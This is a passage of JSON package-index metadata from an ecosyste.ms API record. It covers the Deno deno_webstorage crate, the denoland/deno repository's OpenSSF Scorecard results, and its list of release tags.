Fiszel","email":null,"url":"https://github.com/rubenfiszel","packages_count":3,"html_url":"https://crates.io/users/rubenfiszel","role":null,"created_at":"2023-04-01T15:24:08.308Z","updated_at":"2023-04-01T15:24:08.308Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/rubenfiszel/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047892,"name":"deno_webstorage","ecosystem":"cargo","description":"Implementation of WebStorage API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":254,"first_release_published_at":"2021-05-11T20:40:02.231Z","latest_release_published_at":"2026-08-27T15:19:46.713Z","latest_release_number":"0.253.0","last_synced_at":"2026-09-07T23:02:11.952Z","created_at":"2022-04-12T10:02:56.012Z","updated_at":"2026-09-07T23:02:11.952Z","registry_url":"https://crates.io/crates/deno_webstorage/","install_command":"cargo install deno_webstorage","documentation_url":"https://docs.rs/deno_webstorage/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","pub